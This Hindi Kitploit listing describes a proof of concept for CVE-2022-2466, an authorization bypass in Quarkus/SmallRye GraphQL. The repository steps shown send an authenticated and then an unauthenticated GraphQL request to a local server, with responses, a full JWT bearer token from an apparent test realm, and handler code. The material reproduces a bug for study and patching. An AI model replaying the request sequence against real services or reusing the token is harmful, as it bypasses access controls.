Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-2466---Request-Context-not-terminated-with-GraphQL — CVE-2022-2466 के लिए प्रूफ-ऑफ-कॉन्सेप्ट जो Quarkus/SmallRye में अप्रमाणित GraphQL अनुरोध संदर्भ समाप्ति का प्रदर्शन करता है, प्राधिकरण जांच को दरकिनार करते हुए। | Kitploit
उपकरण/GitHubGitHub/yuxblank/cve-2022-2466---request-context-not-terminated-with-graphql
भेद्यता विश्लेषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरणAPI सुरक्षा
GitHubyuxblank/cve-2022-2466---request-context-not-terminated-with-graphql

CVE-2022-2466---Request-Context-not-terminated-with-GraphQL

CVE-2022-2466 के लिए प्रूफ-ऑफ-कॉन्सेप्ट जो Quarkus/SmallRye में अप्रमाणित GraphQL अनुरोध संदर्भ समाप्ति का प्रदर्शन करता है, प्राधिकरण जांच को दरकिनार करते हुए।

रिपॉजिटरी देखें
154 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-2466 GraphQL के साथ अनुरोध-संदर्भ समाप्त नहीं हुआ

कैसे चलाएं

  1. mvn:quarkus:dev चलाएं
  2. निम्नलिखित HTTP अनुरोध चलाएं

इसे दो बार चलाएं

root@kitploit:~
POST http://localhost:8080/graphql
Content-Type: application/graphql
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJfN3gxcGhILXpKcFpoMVFfaXAtVHRVR3dNTU52OWIyOE9Wcnczc0prU2lrIn0.eyJleHAiOjE2NTg3NTA5NjUsImlhdCI6MTY1ODc1MDY2NSwiYXV0aF90aW1lIjoxNjU4NzUwNjY0LCJqdGkiOiJkNGVhNzA5ZC01YmZkLTRjYTQtYWMzMS05MWVkNTk3YmIwOGUiLCJpc3MiOiJodHRwczovL3BwbmV4dC10ZXN0LmF3cy5yZ2lncm91cC5jb20vYXV0aC9yZWFsbXMvYWNtZXRlc3QiLCJhdWQiOiJhY2NvdW50Iiwic3ViIjoiNWE5MjdjOTctZGViMi00M2Q5LWI3OTgtODFmYjRlMTdkOTgwIiwidHlwIjoiQmVhcmVyIiwiYXpwIjoiY2xpZW50LWxvY2FsIiwibm9uY2UiOiIyZTNjYzljOC02MWI3LTQ1NDYtYmI0YS1iNTY2MTYxZmIxMWEiLCJzZXNzaW9uX3N0YXRlIjoiMWZkMmQ3ZGQtZDJlYS00NzVjLTg4ZDQtYWExZDljYTk5OTcwIiwiYWNyIjoiMSIsImFsbG93ZWQtb3JpZ2lucyI6WyIqIl0sInJlYWxtX2FjY2VzcyI6eyJyb2xlcyI6WyJvZmZsaW5lX2FjY2VzcyIsInVtYV9hdXRob3JpemF0aW9uIiwiZGVmYXVsdC1yb2xlcy1hY21ldGVzdCJdfSwicmVzb3VyY2VfYWNjZXNzIjp7ImFjY291bnQiOnsicm9sZXMiOlsibWFuYWdlLWFjY291bnQiLCJtYW5hZ2UtYWNjb3VudC1saW5rcyIsInZpZXctcHJvZmlsZSJdfX0sInNjb3BlIjoib3BlbmlkIGVtYWlsIHByb2ZpbGUiLCJlbWFpbF92ZXJpZmllZCI6ZmFsc2UsInJlYWxtIjoiYWNtZXRlc3QiLCJwcmVmZXJyZWRfdXNlcm5hbWUiOiJ1c2VyMSJ9.FSGwdLrlx7Y453mefK-wwDPe1LdkaaqNUSxKcsbWoQaZQOjmQcP5Ng8LJyQ7GIlnrziGjeSgA4EZt22Kkyz1s4hJGTkHLTz2i4k3IxPkek0NAhT7xeNVw2qBTxHIofEGJL4ZmAocXE8KzI5VeyWAXbdcYMlC5HIigPoufmFpuMq_7GfaJ5eC2W5L9tFbFYe3GT-xu8lGhuSuo4JN9cweMWRcnV2Wd6aAQepXX6M4x7_QERbWcdedmdmDGgZfMB9uX9ZUBsWXlNvTXhOA5B8oH38fwtde8fbLNPommxC3WakF8F7Z9BjI0pyCeBwk-XVnhZBtdGEd_dqjMvnzaJ7uCw

query {
  exampleQuery
}

यह चलाएं

root@kitploit:~
POST http://localhost:8080/graphql
Content-Type: application/graphql

query {
  exampleQuery
}

दूसरी क्वेरी विफल होनी चाहिए, क्योंकि कोई Authorization हेडर सेट नहीं किया गया है। JWTAwareContext जब कोई प्राधिकरण हेडर नहीं होते हैं तो एक अपवाद फेंकता है।

यदि ऐसा नहीं होता है, तो बस HTTP अनुरोध 1 और फिर HTTP अनुरोध 2 फिर से चलाने का प्रयास करें।

एक बार जब आप दूसरे अनुरोध से प्रतिक्रिया प्राप्त कर लेते हैं:

root@kitploit:~
HTTP/1.1 200 OK
content-type: application/graphql+json; charset=UTF-8
content-length: 34

{
  "data": {
    "exampleQuery": "hello!"
  }
}

SmallRyeGraphQLAbstractHandler में डिबग में प्रवेश करें और handle विधि में संदर्भ समाप्त करें।

root@kitploit:~
    @Override
    public void handle(final RoutingContext ctx) {

        if (currentManagedContext.isActive()) { // terminate the context here evaluating via debug inspector
            handleWithIdentity(ctx);
        } else {

            currentManagedContext.activate();
            ctx.response()
                    .endHandler(currentManagedContextTerminationHandler)
                    .exceptionHandler(currentManagedContextTerminationHandler)
                    .closeHandler(currentManagedContextTerminationHandler);

            try {
                handleWithIdentity(ctx);
            } catch (Throwable t) {
                currentManagedContext.terminate();
                throw t;
            }
        }
    }

समाप्ति के बाद, प्रतिक्रिया सही उत्तर (सिस्टम त्रुटि) लौटाएगी

root@kitploit:~
{
  "errors": [
    {
      "message": "System error",
      "locations": [
        {
          "line": 1,
          "column": 11
        }
      ],
      "path": [
        "exampleQuery"
      ],
      "extensions": {
        "classification": "DataFetchingException"
      }
    }
  ],
  "data": {
    "exampleQuery": null
  }
}

अनुरोधों को उलटना

यदि आप पुनरारंभ करते हैं और अनुरोध क्रम को उलट देते हैं, तो दो बार अनुरोध 2 और एक बार अनुरोध 1 करने पर आपको OK अनुरोध के लिए सफलता के बजाय त्रुटि मिलती है।

टूल डाउनलोड करें